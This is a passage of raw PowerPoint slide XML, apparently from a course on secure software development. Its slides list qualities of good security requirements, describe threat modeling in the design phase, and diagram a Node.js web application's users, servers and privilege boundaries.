        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3225057" y="3287581"/>
            <a:ext cx="1371600" cy="23774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35560" bIns="40005" numCol="1" spcCol="1270" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="176213" lvl="1" indent="-176213" defTabSz="2889250">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Taken as a whole, the requirements communicate all security expectations for the project</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="TextBox 69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4567199" y="3287581"/>
            <a:ext cx="1371600" cy="23774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35560" bIns="40005" numCol="1" spcCol="1270" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl2pPr marL="176213" lvl="1" indent="-176213" defTabSz="2889250">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buChar char="•"/>
              <a:defRPr sz="1600"/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each requirement addresses one and only one thing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="TextBox 70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5909341" y="3287581"/>
            <a:ext cx="1371600" cy="23774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35560" bIns="40005" numCol="1" spcCol="1270" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl2pPr marL="176213" lvl="1" indent="-176213" defTabSz="2889250">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buChar char="•"/>
              <a:defRPr sz="1600"/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Appropriate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attainable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="TextBox 71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7251485" y="3287581"/>
            <a:ext cx="1371600" cy="23774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35560" bIns="40005" numCol="1" spcCol="1270" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl2pPr marL="176213" lvl="1" indent="-176213" defTabSz="2889250">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buChar char="•"/>
              <a:defRPr sz="1600"/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Expressed as something that can be measured</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be evaluated as passing or failing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="578873" y="2718621"/>
            <a:ext cx="7962732" cy="365791"/>
            <a:chOff x="578873" y="2664127"/>
            <a:chExt cx="7962732" cy="365791"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="73" name="Rounded Rectangle 142"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="578873" y="2664127"/>
              <a:ext cx="1219038" cy="365791"/>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ea typeface="+mn-ea"/>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>Symbiotic</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="74" name="Rounded Rectangle 142"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1927612" y="2664127"/>
              <a:ext cx="1219038" cy="365791"/>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ea typeface="+mn-ea"/>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>Evident</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="75" name="Rounded Rectangle 142"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3276351" y="2664127"/>
              <a:ext cx="1219038" cy="365791"/>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ea typeface="+mn-ea"/>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>Complete</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="76" name="Rounded Rectangle 142"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4625090" y="2664127"/>
              <a:ext cx="1219038" cy="365791"/>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ea typeface="+mn-ea"/>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>Unitary</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="77" name="Rounded Rectangle 142"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5973829" y="2664127"/>
              <a:ext cx="1219038" cy="365791"/>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ea typeface="+mn-ea"/>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>Realistic</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="Rounded Rectangle 142"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7322567" y="2664127"/>
              <a:ext cx="1219038" cy="365791"/>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ea typeface="+mn-ea"/>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>Evaluable</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2261419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2CE28-911A-4812-843D-0EBA53D3E0FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Design Phase</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F001358-EFEB-4CD4-A305-39A36A6B9FE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security design involves planning your app around projected risks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Threat modeling:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enables you to identify what needs to be done to harden against attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Outlines the possible attacks that could be made on your app.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identifies how severe each threat is and how much damage it could cause.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Focuses on how the software is structured to identify specific locations where the design is:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerable or flawed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In need of protection or improvement</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7D80977-8831-4588-BC63-823A564BAE33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2049" name="Group 2048"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1698115" y="3641515"/>
            <a:ext cx="5766820" cy="2813480"/>
            <a:chOff x="1795362" y="967711"/>
            <a:chExt cx="5766820" cy="2813480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="Group 8"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2523889" y="1228923"/>
              <a:ext cx="4096222" cy="2244024"/>
              <a:chOff x="4411279" y="1174350"/>
              <a:chExt cx="4096222" cy="2244024"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="18" name="Group 17"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4411279" y="1174350"/>
                <a:ext cx="4096222" cy="2244024"/>
                <a:chOff x="-227257" y="1148312"/>
                <a:chExt cx="8403270" cy="4603544"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="19" name="Rectangle 18"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="336363" y="2177434"/>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500" b="1" kern="0" dirty="0">
                      <a:latin typeface="Arial"/>
                    </a:rPr>
                    <a:t>End User</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="20" name="Rectangle 19"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="326115" y="3813915"/>
                  <a:ext cx="1219200" cy="685800"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solid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500" b="1" kern="0" dirty="0">
                      <a:latin typeface="Arial"/>
                    </a:rPr>
                    <a:t>Site Content Administrator</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="21" name="Group 20"/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="3002978" y="2585284"/>
                  <a:ext cx="1588940" cy="1588940"/>
                  <a:chOff x="2895600" y="2057400"/>
                  <a:chExt cx="1066800" cy="1066800"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="60" name="Oval 59"/>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500" b="1" kern="0" dirty="0">
                      <a:latin typeface="Arial"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="61" name="Oval 60"/>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500" b="1" kern="0" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:rPr>
                      <a:t>Application</a:t>
                    </a:r>
                  </a:p>
                  <a:p>
                    <a:pPr algn="ctr" defTabSz="914400"/>
                    <a:r>
                      <a:rPr lang="en-US" sz="500" b="1" kern="0" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:rPr>
                      <a:t>Server</a:t>
                    </a:r>
                  </a:p>
                  <a:p>
                    <a:pPr algn="ctr" defTabSz="914400"/>
                    <a:r>
                      <a:rPr lang="en-US" sz="500" b="1" kern="0" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:rPr>
                      <a:t>(Node.js)</a:t>
                    </a:r>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="22" name="Arc 21"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="504914"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23" name="Arc 22"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm rot="16501038">
                  <a:off x="1808472" y="194604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24" name="Arc 23"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm rot="5685274">
                  <a:off x="1904128" y="156659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25" name="Rectangle 24"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1559081" y="2082881"/>
                  <a:ext cx="790933" cy="284866"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr defTabSz="914400"/>
                  <a:r>
                    <a:rPr lang="en-US" sz="500" b="1" kern="0" dirty="0">
                      <a:latin typeface="Arial"/>
                    </a:rPr>
                    <a:t>Requests</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="26" name="Rectangle 25"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1539045" y="2785711"/>
                  <a:ext cx="879956" cy="284866"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr defTabSz="914400"/>
                  <a:r>
                    <a:rPr lang="en-US" sz="500" b="1" kern="0" dirty="0">
                      <a:latin typeface="Arial"/>
                    </a:rPr>
                    <a:t>Responses</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="27" name="Arc 26"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm rot="15339464">
                  <a:off x="1837187" y="3465883"/>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28" name="Arc 27"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm rot="4459424">
                  <a:off x="1799210" y="3074499"/>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29" name="Rectangle 28"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1481787" y="3626608"/>
                  <a:ext cx="790933" cy="284866"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr defTabSz="914400"/>
                  <a:r>
                    <a:rPr lang="en-US" sz="500" b="1" kern="0" dirty="0">
                      <a:latin typeface="Arial"/>
                    </a:rPr>
                    <a:t>Requests</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="30" name="Rectangle 29"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1583750" y="4380642"/>
                  <a:ext cx="879956" cy="284866"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr defTabSz="914400"/>
                  <a:r>
                    <a:rPr lang="en-US" sz="500" b="1" kern="0" dirty="0">
                      <a:latin typeface="Arial"/>
                    </a:rPr>
                    <a:t>Responses</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="31" name="Group 30"/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="3901200" y="1152527"/>
                  <a:ext cx="1219200" cy="685800"/>
                  <a:chOff x="4729998" y="1980675"/>
                  <a:chExt cx="1219200" cy="685800"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:cxnSp>
                <p:nvCxnSpPr>
                  <p:cNvPr id="57" name="Straight Connector 56"/>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500" b="1" kern="0" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:rPr>
                      <a:t>Web page templates, images style sheets</a:t>
                    </a:r>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:cxnSp>
                <p:nvCxnSpPr>
                  <p:cNvPr id="59" name="Straight Connector 58"/>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6119832" y="3090027"/>
                  <a:ext cx="1232303" cy="1232303"/>
                  <a:chOff x="2895600" y="2057400"/>
                  <a:chExt cx="1066800" cy="1066800"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="55" name="Oval 54"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="2895600" y="2057400"/>
                    <a:ext cx="1066800" cy="1066800"/>
                  </a:xfrm>
                  <a:prstGeom prst="ellipse">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr rtlCol="0" anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" defTabSz="914400"/>
                    <a:endParaRPr lang="en-US" sz="500" b="1" kern="0" dirty="0">
                      <a:latin typeface="Arial"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="56" name="Oval 55"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3048000" y="2209800"/>
                    <a:ext cx="762000" cy="762000"/>
                  </a:xfrm>
                  <a:prstGeom prst="ellipse">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr lIns="0" tIns="0" rIns="0" rtlCol="0" anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" defTabSz="914400"/>
                    <a:r>
                      <a:rPr lang="en-US" sz="500" b="1" kern="0" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:rPr>
                      <a:t>Database Server</a:t>
                    </a:r>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="33" name="Group 32"/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="6956813" y="1418726"/>
                  <a:ext cx="1219200" cy="685800"/>
                  <a:chOff x="4729998" y="1980675"/>
                  <a:chExt cx="1219200" cy="685800"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:cxnSp>
                <p:nvCxnSpPr>
                  <p:cNvPr id="52" name="Straight Connector 51"/>
                  <p:cNvCxnSpPr/>
                  <p:nvPr/>
                </p:nvCxnSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="4729998" y="202548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4729998" y="1980675"/>
                    <a:ext cx="1219200" cy="685800"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>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14400"/>
                    <a:r>
                      <a:rPr lang="en-US" sz="500" b="1" kern="0" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:rPr>
                      <a:t>Product Data in Database</a:t>
                    </a:r>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:cxnSp>
                <p:nvCxnSpPr>
                  <p:cNvPr id="54" name="Straight Connector 53"/>
                  <p:cNvCxnSpPr/>
                  <p:nvPr/>
                </p:nvCxnSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="4729998" y="2626236"/>
                    <a:ext cx="121360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4" name="Arc 33"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm rot="5400000" flipH="1">
                  <a:off x="788329" y="2253778"/>
                  <a:ext cx="1482289" cy="3513462"/>
                </a:xfrm>
                <a:prstGeom prst="arc">
                  <a:avLst>
                    <a:gd name="adj1" fmla="val 17842670"/>
                    <a:gd name="adj2" fmla="val 4220416"/>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35" name="Rectangle 34"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="711239" y="3007054"/>
                  <a:ext cx="1319662" cy="284866"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr defTabSz="914400"/>
                  <a:r>
                    <a:rPr lang="en-US" sz="500" b="1" kern="0" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="01A1DD"/>
                      </a:solidFill>
                      <a:latin typeface="Arial"/>
                    </a:rPr>
                    <a:t>End User Privileges</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="36" name="Rectangle 35"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="445110" y="4700297"/>
                  <a:ext cx="1613701" cy="284866"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr defTabSz="914400"/>
                  <a:r>
                    <a:rPr lang="en-US" sz="500" b="1" kern="0" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="01A1DD"/>
                      </a:solidFill>
                      <a:latin typeface="Arial"/>
                    </a:rPr>
                    <a:t>Content Admin Privileges</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="37" name="Rectangle 36"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3107293" y="4704356"/>
                  <a:ext cx="1678443" cy="284866"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr defTabSz="914400"/>
                  <a:r>
                    <a:rPr lang="en-US" sz="500" b="1" kern="0" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="01A1DD"/>
                      </a:solidFill>
                      <a:latin typeface="Arial"/>
                    </a:rPr>
                    <a:t>Web App Server Privileges</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="38" name="Rectangle 37"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6323878" y="4701453"/>
                  <a:ext cx="1689234" cy="284866"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr defTabSz="914400"/>
                  <a:r>
                    <a:rPr lang="en-US" sz="500" b="1" kern="0" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="01A1DD"/>
                      </a:solidFill>
                      <a:latin typeface="Arial"/>
                    </a:rPr>
                    <a:t>Database Server Privileges</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="39" name="Arc 38"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm rot="16501038">
                  <a:off x="4843699" y="2961360"/>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40" name="Arc 39"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm rot="5685274">
                  <a:off x="4939355" y="2581901"/>
                  <a:ext cx="914400" cy="1689100"/>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41" name="Rectangle 40"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
